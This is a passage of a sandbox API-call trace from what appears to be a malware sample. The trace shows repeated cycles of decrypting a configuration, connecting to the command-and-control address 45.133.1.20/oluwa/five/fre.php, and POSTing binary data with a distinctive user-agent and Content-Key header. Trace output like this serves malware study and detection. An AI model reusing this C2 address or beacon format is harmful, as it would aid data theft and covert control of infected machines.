ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.445] GetProcessHeap () returned 0x6a0000 [0185.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0185.451] GetProcessHeap () returned 0x6a0000 [0185.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0185.452] GetProcessHeap () returned 0x6a0000 [0185.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0185.453] GetProcessHeap () returned 0x6a0000 [0185.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0185.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0185.469] GetProcessHeap () returned 0x6a0000 [0185.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0185.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.472] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0185.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.473] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.474] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.474] GetProcessHeap () returned 0x6a0000 [0185.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0185.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.475] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0185.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.479] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0185.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.487] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0185.487] GetProcessHeap () returned 0x6a0000 [0185.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0185.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.489] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0185.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.490] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0185.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.491] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0185.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.495] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0185.495] GetProcessHeap () returned 0x6a0000 [0185.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0185.496] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfa08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0185.496] GetProcessHeap () returned 0x6a0000 [0185.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0185.496] socket (af=2, type=1, protocol=6) returned 0x43c [0185.496] connect (s=0x43c, name=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0185.522] FreeAddrInfoW (pAddrInfo=0x6bfa08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0185.522] GetProcessHeap () returned 0x6a0000 [0185.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0185.523] GetProcessHeap () returned 0x6a0000 [0185.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0185.525] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0185.526] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.526] GetProcessHeap () returned 0x6a0000 [0185.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0185.526] GetProcessHeap () returned 0x6a0000 [0185.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0185.526] GetProcessHeap () returned 0x6a0000 [0185.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0185.526] GetProcessHeap () returned 0x6a0000 [0185.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0185.527] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0185.528] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.529] GetProcessHeap () returned 0x6a0000 [0185.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0185.529] GetProcessHeap () returned 0x6a0000 [0185.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0185.529] send (s=0x43c, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0185.530] send (s=0x43c, buf=0x6bb998*, len=159, flags=0) returned 159 [0185.530] GetProcessHeap () returned 0x6a0000 [0185.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0185.530] recv (in: s=0x43c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0185.599] GetProcessHeap () returned 0x6a0000 [0185.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0185.600] GetProcessHeap () returned 0x6a0000 [0185.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0185.602] GetProcessHeap () returned 0x6a0000 [0185.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0185.603] GetProcessHeap () returned 0x6a0000 [0185.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0185.603] closesocket (s=0x43c) returned 0 [0185.604] GetProcessHeap () returned 0x6a0000 [0185.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0185.604] GetProcessHeap () returned 0x6a0000 [0185.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0185.604] GetProcessHeap () returned 0x6a0000 [0185.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0185.604] GetProcessHeap () returned 0x6a0000 [0185.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0185.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1148) returned 0x43c [0185.606] Sleep (dwMilliseconds=0xea60) [0185.608] GetProcessHeap () returned 0x6a0000 [0185.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0185.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.609] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0185.624] GetProcessHeap () returned 0x6a0000 [0185.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0185.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.625] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0185.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.626] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.627] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.627] GetProcessHeap () returned 0x6a0000 [0185.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0185.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.629] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0185.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.631] CryptDestroyKey (hKey=0x6ad020) returned 1 [0185.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.632] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0185.632] GetProcessHeap () returned 0x6a0000 [0185.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0185.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.633] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.638] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.638] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.639] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.639] GetProcessHeap () returned 0x6a0000 [0185.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0185.646] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.648] GetProcessHeap () returned 0x6a0000 [0185.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0185.649] GetProcessHeap () returned 0x6a0000 [0185.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0185.649] GetProcessHeap () returned 0x6a0000 [0185.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0185.650] GetProcessHeap () returned 0x6a0000 [0185.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0185.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0185.675] GetProcessHeap () returned 0x6a0000 [0185.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0185.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.676] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0185.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.678] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.681] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.681] GetProcessHeap () returned 0x6a0000 [0185.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0185.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.683] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0185.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.684] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0185.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.686] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0185.686] GetProcessHeap () returned 0x6a0000 [0185.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0185.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.687] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0185.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.688] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0185.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.689] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0185.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.690] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0185.692] GetProcessHeap () returned 0x6a0000 [0185.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0185.692] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf878*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0185.692] GetProcessHeap () returned 0x6a0000 [0185.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0185.692] socket (af=2, type=1, protocol=6) returned 0x440 [0185.692] connect (s=0x440, name=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0185.717] FreeAddrInfoW (pAddrInfo=0x6bf878*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea00*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0185.717] GetProcessHeap () returned 0x6a0000 [0185.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0185.717] GetProcessHeap () returned 0x6a0000 [0185.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0185.718] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0185.719] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.719] GetProcessHeap () returned 0x6a0000 [0185.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0185.719] GetProcessHeap () returned 0x6a0000 [0185.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0185.719] GetProcessHeap () returned 0x6a0000 [0185.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0185.719] GetProcessHeap () returned 0x6a0000 [0185.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0185.720] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0185.721] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.721] GetProcessHeap () returned 0x6a0000 [0185.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0185.721] GetProcessHeap () returned 0x6a0000 [0185.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0185.721] send (s=0x440, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0185.722] send (s=0x440, buf=0x6bb998*, len=159, flags=0) returned 159 [0185.722] GetProcessHeap () returned 0x6a0000 [0185.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0185.722] recv (in: s=0x440, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0185.798] GetProcessHeap () returned 0x6a0000 [0185.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0185.798] GetProcessHeap () returned 0x6a0000 [0185.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0185.800] GetProcessHeap () returned 0x6a0000 [0185.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0185.874] GetProcessHeap () returned 0x6a0000 [0185.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0185.875] closesocket (s=0x440) returned 0 [0185.878] GetProcessHeap () returned 0x6a0000 [0185.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0185.878] GetProcessHeap () returned 0x6a0000 [0185.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0185.891] GetProcessHeap () returned 0x6a0000 [0185.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0185.891] GetProcessHeap () returned 0x6a0000 [0185.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0185.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1154) returned 0x440 [0185.894] Sleep (dwMilliseconds=0xea60) [0185.897] GetProcessHeap () returned 0x6a0000 [0185.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0185.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.898] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.910] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0185.969] GetProcessHeap () returned 0x6a0000 [0185.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0185.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.971] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0185.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.972] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.973] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.973] GetProcessHeap () returned 0x6a0000 [0185.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0185.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.975] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0185.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.977] CryptDestroyKey (hKey=0x6ad020) returned 1 [0185.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.978] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0185.978] GetProcessHeap () returned 0x6a0000 [0185.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0185.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.982] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.983] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.985] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.986] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.986] GetProcessHeap () returned 0x6a0000 [0185.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0185.987] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.987] GetProcessHeap () returned 0x6a0000 [0185.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0185.988] GetProcessHeap () returned 0x6a0000 [0185.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0185.988] GetProcessHeap () returned 0x6a0000 [0185.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0185.989] GetProcessHeap () returned 0x6a0000 [0185.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0185.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.993] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, 